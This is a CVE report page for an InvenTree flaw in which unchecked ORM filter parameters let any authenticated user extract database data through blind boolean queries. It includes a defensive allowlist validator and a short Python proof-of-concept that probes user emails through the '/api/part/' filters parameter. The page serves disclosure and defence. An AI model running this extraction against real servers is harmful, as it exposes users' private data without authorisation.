Security Vulnerability Report
CVE-2026-33530 CVSS 7.7 HIGH

CVE-2026-33530

Published: 2026-03-26 20:16:15
Last Modified: 2026-04-01 18:48:48

Description

InvenTree is an Open Source Inventory Management System. Prior to version 1.2.6, certain API endpoints associated with bulk data operations can be hijacked to exfiltrate sensitive information from the database. The bulk operation API endpoints (e.g. `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, and others) accept a filters parameter that is passed directly to Django's ORM queryset.filter(**filters) without any field allowlisting. This enables any authenticated user to traverse model relationships using Django's __ lookup syntax and perform blind boolean-based data extraction. This issue is patched in version 1.2.6, and 1.3.0 (or above). Users should update to the patched versions. No known workarounds are available.
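The root cause described above is that client-supplied filter keys reach `queryset.filter(**filters)` unchecked, so a key such as `owner__email__startswith` walks across model relationships. The validator below is an added illustration of the fix class (a field and lookup allowlist applied before the ORM call); it is not InvenTree's own patch, and the field names in `PART_FILTER_FIELDS` are assumed for the example.

```python
import re

# Added example, not InvenTree's code. Field names below are assumptions.
# Lookups a client may apply to an allowlisted field of the queried model.
ALLOWED_LOOKUPS = {"exact", "iexact", "in", "gt", "gte", "lt", "lte",
                   "isnull", "icontains"}

# Per-endpoint allowlist of filterable fields (assumed names for /api/part/).
PART_FILTER_FIELDS = {"name", "category", "active", "IPN"}

_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


class UnsafeFilter(ValueError):
    """Raised when a client-supplied filter key is not on the allowlist."""


def validate_filters(filters, allowed_fields, allowed_lookups=ALLOWED_LOOKUPS):
    """Return a copy of `filters` that is safe to unpack into queryset.filter().

    Each key is split on Django's '__' separator. The first segment must be an
    allowlisted field of the model being queried; at most one further segment
    is accepted and it must be a plain lookup (e.g. 'category__in'), never a
    field on a related model (e.g. 'owner__email__startswith'). That rule is
    what blocks relationship traversal and the blind extraction it enables.
    """
    if not isinstance(filters, dict):
        raise UnsafeFilter("filters must be a JSON object")
    clean = {}
    for key, value in filters.items():
        parts = key.split("__")
        # Reject empty segments ('name__', '__name') and non-identifier text.
        if not all(_NAME_RE.match(p) for p in parts):
            raise UnsafeFilter(f"malformed filter key: {key!r}")
        field, *rest = parts
        if field not in allowed_fields:
            raise UnsafeFilter(f"field not filterable: {field!r}")
        if len(rest) > 1 or (rest and rest[0] not in allowed_lookups):
            raise UnsafeFilter(f"lookup or traversal not permitted: {key!r}")
        clean[key] = value
    return clean


def is_safe(filters, allowed_fields=PART_FILTER_FIELDS):
    """Predicate form: True if validate_filters accepts the dict unchanged."""
    try:
        validate_filters(filters, allowed_fields)
    except UnsafeFilter:
        return False
    return True
```

The key test is the traversal case from the PoC: `owner__email__startswith` fails because `owner` is not an allowlisted field, and `category__name__icontains` fails because it carries a second segment that is not a lookup.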

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:* - VULNERABLE
InvenTree < 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-33530: Blind Boolean-based Data Extraction via Django ORM

# Target endpoint example
url = "http://target-domain/api/part/"

# Headers with low-privilege authentication token
headers = {
    "Authorization": "Token <LOW_PRIV_TOKEN>",
    "Content-Type": "application/json"
}

# Malicious payload using Django ORM double underscore syntax
# Attempting to traverse relationships to check sensitive data (e.g., User model)
# Example: Checking if a user email starts with 'a'
payload = {
    "filters": "owner__email__startswith=a"
}

response = requests.get(url, headers=headers, params=payload)

if response.status_code == 200:
    # If results are returned, the condition is True
    data = response.json()
    if data:
        print("[+] Condition TRUE: Data found matching filter.")
    else:
        print("[-] Condition FALSE: No data found.")
else:
    print(f"Request failed with status code: {response.status_code}")
```

References

https://github.com/inventree/InvenTree/pull/11581 (Issue Tracking, Patch)
https://github.com/inventree/InvenTree/security/advisories/GHSA-m8j2-vfmq-p6qg (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33530", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:15.237", "lastModified": "2026-04-01T18:48:48.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. Prior to version 1.2.6, certain API endpoints associated with bulk data operations can be hijacked to exfiltrate sensitive information from the database. The bulk operation API endpoints (e.g. `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, and others) accept a filters parameter that is passed directly to Django's ORM queryset.filter(**filters) without any field allowlisting. This enables any authenticated user to traverse model relationships using Django's __ lookup syntax and perform blind boolean-based data extraction. This issue is patched in version 1.2.6, and 1.3.0 (or above). Users should update to the patched versions. No known workarounds are available."}, {"lang": "es", "value": "InvenTree es un Sistema de Gestión de Inventario de Código Abierto. Antes de la versión 1.2.6, ciertos endpoints de la API asociados con operaciones de datos masivas pueden ser secuestrados para exfiltrar información sensible de la base de datos. Los endpoints de la API de operaciones masivas (por ejemplo, `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, y otros) aceptan un parámetro 'filters' que se pasa directamente a `queryset.filter(**filters)` del ORM de Django sin ninguna lista blanca de campos. Esto permite a cualquier usuario autenticado recorrer relaciones de modelos usando la sintaxis de búsqueda `__` de Django y realizar extracción de datos ciega basada en booleanos. Este problema está parcheado en la versión 1.2.6, y 1.3.0 (o superior). Los usuarios deben actualizar a las versiones parcheadas. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-202"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.6", "matchCriteriaId": "E308BCC2-3004-4830-92B8-4462819ECD0D"}]}]}], "references": [{"url": "https://github.com/inventree/InvenTree/pull/11581", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-m8j2-vfmq-p6qg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```